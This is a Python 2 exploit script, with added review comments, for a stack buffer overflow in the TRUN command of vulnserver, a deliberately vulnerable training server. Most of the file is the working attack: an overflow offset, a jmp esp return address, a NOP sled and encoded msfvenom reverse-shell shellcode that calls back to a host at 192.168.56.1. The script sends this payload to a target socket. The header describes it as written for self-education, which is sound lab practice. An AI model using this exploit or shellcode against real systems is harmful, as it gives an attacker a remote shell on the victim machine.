#!/usr/bin/env python
#################################
# Stack buffer overflow of 'TRUN' command on vulnserver.exe
# http://www.thegreycorner.com/2010/12/introducing-vulnserver.html
#
# Author: Bengman
#
# Tested on: Win XP SP3
# Badchars: \x00
#
# This was developed for my own educational purposes
# I did not discover the vulnerability
#################################
# NOTE(review): this is a Python 2 script (print statements, str payload with
# "\x.." escapes). Under Python 3 the print lines are syntax errors and the
# socket API requires bytes, so it does not run unchanged.
import socket
import struct
import sys
offset = 2006 # ret overwrite at 2006 bytes into buffer
# Hard-coded return address packed little-endian. This only works if the module
# it points into loads at the same base every time; presumably that is why the
# header pins the tested OS -- DEP/ASLR on the target would break this layout.
ret = struct.pack('<L', 0x625011AF) # jmp esp in essfunc.dll
# 20-byte NOP sled placed right after the return address.
nopsled = "\x90"*20
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.1 -e x86/shikata_ga_nai -b "\x00" -f python -v shellcode
# Payload size: 351 bytes
shellcode = ""
shellcode += "\xbd\x67\x90\xaf\x43\xda\xc1\xd9\x74\x24\xf4\x58"
shellcode += "\x2b\xc9\xb1\x52\x31\x68\x12\x83\xc0\x04\x03\x0f"
shellcode += "\x9e\x4d\xb6\x33\x76\x13\x39\xcb\x87\x74\xb3\x2e"
shellcode += "\xb6\xb4\xa7\x3b\xe9\x04\xa3\x69\x06\xee\xe1\x99"
shellcode += "\x9d\x82\x2d\xae\x16\x28\x08\x81\xa7\x01\x68\x80"
shellcode += "\x2b\x58\xbd\x62\x15\x93\xb0\x63\x52\xce\x39\x31"
shellcode += "\x0b\x84\xec\xa5\x38\xd0\x2c\x4e\x72\xf4\x34\xb3"
shellcode += "\xc3\xf7\x15\x62\x5f\xae\xb5\x85\x8c\xda\xff\x9d"
shellcode += "\xd1\xe7\xb6\x16\x21\x93\x48\xfe\x7b\x5c\xe6\x3f"
shellcode += "\xb4\xaf\xf6\x78\x73\x50\x8d\x70\x87\xed\x96\x47"
shellcode += "\xf5\x29\x12\x53\x5d\xb9\x84\xbf\x5f\x6e\x52\x34"
shellcode += "\x53\xdb\x10\x12\x70\xda\xf5\x29\x8c\x57\xf8\xfd"
shellcode += "\x04\x23\xdf\xd9\x4d\xf7\x7e\x78\x28\x56\x7e\x9a"
shellcode += "\x93\x07\xda\xd1\x3e\x53\x57\xb8\x56\x90\x5a\x42"
shellcode += "\xa7\xbe\xed\x31\x95\x61\x46\xdd\x95\xea\x40\x1a"
shellcode += "\xd9\xc0\x35\xb4\x24\xeb\x45\x9d\xe2\xbf\x15\xb5"
shellcode += "\xc3\xbf\xfd\x45\xeb\x15\x51\x15\x43\xc6\x12\xc5"
shellcode += "\x23\xb6\xfa\x0f\xac\xe9\x1b\x30\x66\x82\xb6\xcb"
shellcode += "\xe1\x6d\xee\xeb\xf0\x05\xed\x0b\xe2\x89\x78\xed"
shellcode += "\x6e\x22\x2d\xa6\x06\xdb\x74\x3c\xb6\x24\xa3\x39"
shellcode += "\xf8\xaf\x40\xbe\xb7\x47\x2c\xac\x20\xa8\x7b\x8e"
shellcode += "\xe7\xb7\x51\xa6\x64\x25\x3e\x36\xe2\x56\xe9\x61"
shellcode += "\xa3\xa9\xe0\xe7\x59\x93\x5a\x15\xa0\x45\xa4\x9d"
shellcode += "\x7f\xb6\x2b\x1c\x0d\x82\x0f\x0e\xcb\x0b\x14\x7a"
shellcode += "\x83\x5d\xc2\xd4\x65\x34\xa4\x8e\x3f\xeb\x6e\x46"
shellcode += "\xb9\xc7\xb0\x10\xc6\x0d\x47\xfc\x77\xf8\x1e\x03"
shellcode += "\xb7\x6c\x97\x7c\xa5\x0c\x58\x57\x6d\x3c\x13\xf5"
shellcode += "\xc4\xd5\xfa\x6c\x55\xb8\xfc\x5b\x9a\xc5\x7e\x69"
shellcode += "\x63\x32\x9e\x18\x66\x7e\x18\xf1\x1a\xef\xcd\xf5"
shellcode += "\x89\x10\xc4"
# Buffer layout: `offset` bytes of filler, the 4-byte return address, the
# 20-byte NOP sled, the shellcode, then trailing filler so the total is exactly
# 3000 bytes (the arithmetic subtracts each earlier component from 3000).
# From a detection standpoint this is an easy signature on the wire: a 'TRUN .'
# command followed by an argument of ~3000 bytes containing a run of 0x90.
payload = "A"*offset + ret + nopsled + shellcode + "C"*(3000-offset-4-20-len(shellcode))
try:
    # connect to target
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # socket.connect() returns None; this assignment is never read.
    connect = s.connect(('192.168.56.101',666))
    print "[+] Sending payload to target"
    # Read the server banner before sending, then read once more afterwards.
    s.recv(1024)
    s.send('TRUN .' + payload)
    s.recv(1024)
    # BUG: missing parentheses -- this expression only references the bound
    # method and never closes the socket. It should be s.close().
    s.close
# NOTE(review): a bare except also swallows SystemExit and KeyboardInterrupt;
# catching socket.error would be narrower and keep Ctrl-C working.
except:
    print "Unable to connecto to target...crashed?"
    sys.exit(0)